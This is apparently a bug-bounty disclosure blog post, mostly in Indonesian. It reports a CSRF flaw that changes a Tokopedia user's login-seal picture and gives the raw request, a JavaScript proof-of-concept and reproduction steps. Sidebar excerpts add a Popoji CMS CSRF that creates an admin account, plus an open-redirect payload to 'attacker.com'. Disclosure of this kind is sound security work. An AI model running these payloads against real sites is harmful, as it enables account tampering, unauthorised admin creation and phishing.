Tokopedia - CSRF On Change Picture Login Seal On Tokopedia

CSRF Issue On Tokopedia, 

List of bug on Tokopedia :
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html
-
http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html
Halo,
Saya menemukan sebuah bug CSRF di tokopedia

Pendahuluan
bug ini bisa mengubah user picture di login seal

Vuln Request:
POST /seal/save HTTP/1.1
Host: accounts.tokopedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: Somecookie
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 157

text=https%3A%2f%2fecs7.tokopedia.net%2fimg%2fcache%2f100-square%2fattachment%2f2017%2f4%2f7%2floginseal%2floginseal_6817c7d0-1f7c-4412-a1d8-03848aad6f6b.jpg

Poc Code:
<script>
      function getMe(){
        // retrieve page content
        var xhr = new XMLHttpRequest();

        // now execute the CSRF attack
        xhr.open("POST", "https://accounts.tokopedia.com/seal/save", true);
        xhr.withCredentials="true";
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.send('text=https%3A%2f%2fecs7.tokopedia.net%2fimg%2fcache%2f100-square%2fattachment%2f2017%2f4%2f7%2floginseal%2floginseal_6817c7d0-1f7c-4412-a1d8-03848aad6f6b.jpg');
        }
</script>
<button onclick="getMe();">Let's Rock</button>

Note: text adalah letak foto baru user lain

Bug ini bisa terjadi karena tidak ada verifikasi token untuk pengubahan foto, (hanya di uploadnya aja ada)

Step to reproduce:
- simpan poc code ke .html
- eksekusi kode,
- foto akan digantikan dengan foto yang terletak di text

Jika butuh video, saya upload di :
https://youtu.be/tCqozbbj-3E (video sudah saya private)

Timeline: 
- 7 April 2017 => Reporting
- 10 May => Fixing & Ask Document
- Waiting Bounty ( Will be edited )

Comments

Post a Comment

Popular posts from this blog

Open Redirect On Codepolitan.com

Image
Open Redirect On Codepolitan.com Description :  Open redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access. Impact : Force user go to untrusted website from codepolitan website Location of bug :  https://www.codepolitan.com/users/login?callback= Payload : http://attacker.com Reproduce : 1. Open https://www.cod...
Read more

Tokopedia - CSRF On Open Store

Image
CSRF Issue On Tokopedia,  List of bug on Tokopedia : - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-to-create-new-store-for.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-report-item.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-on.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-change-picture-login.html - http://v1nsh4n.blogspot.com/2017/05/tokopedia-csrf-on-open-store.html Halo, Saya menemukan sebuah bug CSRF di tokopedia Pendahuluan bug ini bisa mengubah user picture di login seal Vuln Request: POST /ajax/shop/shop-status.pl?action=event_re_open HTTP/1.1 Host: www.tokopedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 33 Origin: null Cookie: Some Cookie Connection: close action=event_re_open&s_id=[id toko]...
Read more

Missing CSRF Token On Add Admin [Popoji CMS]

Image
Description: This is happen because when request add admin there's no CSRF token Step To Reproduce : <script>function getMe(){ // retrieve page content var xhr = new XMLHttpRequest(); // now execute the CSRF attack xhr.open("POST", "http://root/popoji/poadmin/ route.php?mod=user&act=addnew", true); xhr.withCredentials="true"; xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashan dy21%40gmail.com&no_telp=083833232954&level=1'); } </script> <button onclick="getMe();">Let's Rock</button> 1. Save code to .html 2. upload them to host 3. execute it. Video :  https://www.youtube.com/watch?v=1FXXuSiB6jo Fix & Mitigation : give token when request sensitive action. Note: them give me permission to disclose it, and th...
Read more